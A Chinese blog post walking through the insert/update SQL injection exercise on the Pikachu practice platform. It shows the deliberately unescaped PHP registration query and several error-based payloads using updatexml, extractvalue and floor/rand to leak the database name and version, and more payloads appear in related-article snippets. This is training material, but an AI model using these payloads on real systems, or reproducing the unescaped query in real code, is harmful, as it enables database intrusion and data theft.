Pikachu 漏洞练习平台 “insert/updata”注入

最新推荐文章于 2024-01-11 18:38:03 发布
最新推荐文章于 2024-01-11 18:38:03 发布
阅读量275 收藏
点赞数
文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GitHub_3/article/details/115412770
版权

Pikachu 漏洞练习平台 “insert/updata”注入

源代码

$html='';
if(isset($_POST['submit'])){
    if($_POST['username']!=null &&$_POST['password']!=null){
//      $getdata=escape($link, $_POST);//转义

        //没转义,导致注入漏洞,操作类型为insert
        $getdata=$_POST;
        $query="insert into member(username,pw,sex,phonenum,email,address) values('{$getdata['username']}',md5('{$getdata['password']}'),'{$getdata['sex']}','{$getdata['phonenum']}','{$getdata['email']}','{$getdata['add']}')";
        $result=execute($link, $query);
        if(mysqli_affected_rows($link)==1){
            $html.="<p>注册成功,请返回<a href='sqli_login.php'>登录</a></p>";
        }else {
            $html.="<p>注册失败,请检查下数据库是否还活着</p>";

        }
    }else{
        $html.="<p>必填项不能为空哦</p>";
    }
}

注入Payload

  1. kobe’ or updatexml(1,concat(0x7e,database()),0) or '
  2. *kobe’ and (select 2 from (select count(*),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a)#
  3. kobe’ extractvalue(0,concat(0x7e,version())) #

UPDATEXML (XML_document, XPath_string, new_value);
XML_document是String格式,为XML文档对象的名称;
XPath_string (Xpath格式的字符串) ;
new_value,String格式,替换查找到的符合条件的数据 ;
作用:改变文档中符合条件的节点的值。

FLOOR()函数可参考
SQL注入:floor()报错注入

时淼啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu注入insert注入
2201_75756681的博客
03-29 474
漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。我们爆出来数据库名后就是要开始爆表名了列名同理,但是提醒一点就是列名可能有多个加group_concat参数结果可能会被截断所以要加上limit。在网上经过查找资料发现insert注入几乎写的不全,自己复制后发现注入语句错误,使得自己还要更改,现在更新一篇insert注入的过程。最后开始爆数据爆username的数据。第三步就是开始我们的注入 了。
[Pikachu靶场实战系列] SQL注入insert/update注入
00勇士王子的博客
07-28 3426
insert注入 发现有个注册页面,注册页面如果有注入漏洞的话,一般是insert类型的,因为注册相当于往数据库的表中插入一行新数据 填写注册信息,然后抓个包,可以看到时post形式传输的数据 尝试在admiin后加单引号,报错了而且报错信息中没有出现admiin,可能是单引号完成闭合了,最后还需要加个)完成闭合 添加其他参数和)构建闭合 username=admiin’,‘111’,‘222’,‘333’,‘444’,‘555’)# 构建好闭合了,但是这个注册页面是没有回显的,怎样查询数据呢,
Pikachu的”insert/update”注入
weixin_50339082的博客
06-15 2265
Pikachu的”insert/update”注入 一、相关函数 UpdateXML(xml_target,xpath_expr,new_xml) #此函数将xml_target中用xpath_expr路径匹配到XML片段用new_xml替换,然后返回更改后的XML。 #xml_target被替换的部分与xpath_expr用户提供的XPath表达式匹配。 #如果找不到表达式匹配 xpath_expr项,或者找到多个匹配项,则该函数返回原始 ml_targetXML片段。 #所有三个参数都应为字符串。 E
Pikachu SQL注入insert/update注入
最新发布
SS_liang的博客
01-11 1596
updateXML函数是一种在XML文档中修改或更新指定节点的方法。它在许多编程语言和XML处理库中都有实现。updateXML函数通常接受三个参数:XML文档、XPath表达式和要更新的值。XML文档是要进行修改的原始XML数据。XPath表达式用于定位要更新的节点。它可以是简单的节点路径,也可以使用更复杂的条件和过滤器来选择节点。要更新的值是要设置给节点的新值。当调用updateXML函数时,它会根据XPath表达式找到匹配的节点,然后将其值设置为指定的新值。
pikachu sql注入insert/update注入
IPIutol的博客
09-06 103
基础语句:id=x' or updatexml(1,concat(0x7e,(payload)),0) #substr(string,start<,length>)从string 的start位置开始提取字符串。length:待提取的字符串的长度,若length为一下情况时,返回整个字符串的所有字符。@@datadir:爆数据库文件所在位置。4、length大于字符串的长度。updatexml式注入。1、length不指定。3、length为负值。2、length为空。
pikachu SQL注入insert
ANYOUZHEN的博客
05-10 144
利用or进行闭合 构造payload: zrtonnn' or updatexml(1,concat(0x7e,database()),0) or '
pikachu漏洞练习环境
10-25
pikachu漏洞练习环境,直接放在apache中的www目录下即可,如遇到不会安装可留言或者私信我。
8. insert,update注入1
08-03
insert,update注入1"描述的是一种SQL注入攻击的实例,它涉及到通过输入恶意的SQL代码来获取或篡改数据库中的信息。下面将详细解释这种攻击的各个步骤和涉及的知识点。 1. **注入获取数据库**: 攻击者尝试通过在...
pikachu渗透测试平台,最新版本,最稳定版本
06-28
与dvwa相比,Pikachu的每类漏洞根据不同的情况分别设计了不同的子类,同时,为了让这些漏洞变的有意思一些,在Pikachu平台上为每个漏洞都设计了一些小的场景,点击漏洞页面右上角的"提示"可以查看到帮助信息。...
insert&delete注入.txt
06-10
insert&delete注入
cisp-pte考试环境下载-原题 题库.txt
03-06
注册信息安全专业人员-渗透测试方向注册考试是为了锻炼考生实际解决网络安全问题的能力,有效提升我国网络安全防御能力,促进国家企事业单位网络安全健康发展,为发现人才,选拔优秀人才而设立的技能水平注册考试。 本考试为业内首家实操型渗透测试技术水平注册考试,考试内容从多个角度出发,将客观题与实操题两者结合,来考核考生的全面能力。通过多个得分点,充分检验考生对于最新网络安全技术的掌握程度,展现考生在真实的网络环境中发现问题和解决问题的能力。确保通过考试的考生能在实际工作中独当一面。 admin123 centos:root admin123 解压密码: PTE考试专用
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞
pikachu靶场(sql注入 insert/update)
weixin_54431413的博客
03-14 4400
pikachu里的update/insert注入 2.对红色圈圈里所提交的参数进行注入 3.常用函数符号 (1)0x7e表示 ~符号 (2)database()显示出数据库名字 (3)version()显示出版本号 (4)user()显示出用户名 ...
pikachu sql注入insert and update 详解
m0_52241591的博客
11-09 232
小白一看就会
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2484
Pikachu-----Sql Inject(SQL注入
SQL注入——update注入pikachu)
W小哥
01-15 3208
第一步:访问目标站点,注册一个账号xiaosan:123456,并登录 第二步:点击修改个人信息,并用burpsuite工具拦截数据包,修改住址为123456 拦截数据包,右键发送到Repeater 第三步:测试注入点 正常请求页面 输入单引号测试注入点页面 第四步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,co...
SQL注入——insert注入pikachu)
W小哥
01-14 3789
第一步:访问目标网站,点击注册 第二步:填写注册内容并使用burpsuite抓取数据包,右键send toRepeater 第三步:数据包不修改,正常发送,返回内容如下所示 第四步:测试注入点 数据包中注册用户username修改,返回页面如下所示 第五步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字 1’ or updatexml(1,concat(0...
pikachu平台之sql注入
qq_42728977的博客
12-24 694
参考链接 原理 SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 基本流程 1.2SQL注入攻击流程 第一步:注入点探测 自动方式:使用web漏洞扫描工具,自动进行注入点发现 手动方式:手工构造SQL注入测试语句进行注入点发现 第二步:信息获取 通过...
继续熟悉burpSuite及pikachu注入漏洞演示2
weixin_44722125的博客
03-31 382
union 注入 只有知道正确的字段数才能去拼接union 如何去猜对应查询的字段数:在sql中用order by 进行猜测 order by 1 查询结果按照第一列进行排序 order by 2 查询结果按照第二列进行排序 在实际的猜测中可以用二分法进行测试 用5试一下 报错 用3试一下 也不对 用2试一下 对了 证实主查询里只有2个字段 接下来用union去做拼接 xx’unio...
pikachu靶场insert/update注入
10-21
pikachu靶场是一个专门用于测试SQL注入漏洞的靶场,其中包括了insert/update注入。在pikachu靶场中,insert/update注入漏洞通常出现在用户注册、登录、修改个人信息等功能中。攻击者可以通过构造恶意的SQL语句,将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值